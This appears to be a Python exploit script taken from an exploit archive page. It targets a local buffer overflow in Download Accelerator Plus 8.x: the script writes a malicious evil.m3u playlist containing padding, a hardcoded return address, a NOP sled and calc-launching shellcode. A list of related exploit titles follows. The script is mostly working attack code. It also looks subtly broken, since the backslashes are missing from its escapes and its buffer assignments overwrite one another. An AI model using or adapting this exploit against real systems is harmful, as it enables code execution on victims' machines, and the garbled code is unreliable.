#!/usr/bin/python
# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun ;]
##
from struct import pack
shellcode = (
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6"
"xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7"
"x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58"
"x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae"
"x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60"
"xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf"
"xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70"
"x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33"
"xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04"
"x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")
RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)
m3u = 'http://localhost/verify_me________________________________%s.mp3'
buf = 'A' * 14074
buf = pack('<L', RET)
buf = 'x90' * 32
buf = shellcode
m3u %= buf
fd = open('evil.m3u', 'wb')
fd.write(m3u)
fd.close()
print 'DONE, import the evil.m3u and click "Verify"'
# EoF
【Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day】相关文章:
★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
★ Debian Sarge Multiple IMAP Server Denial of Service Exploit
★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
★ DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit
★ Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
★ FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
★ Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit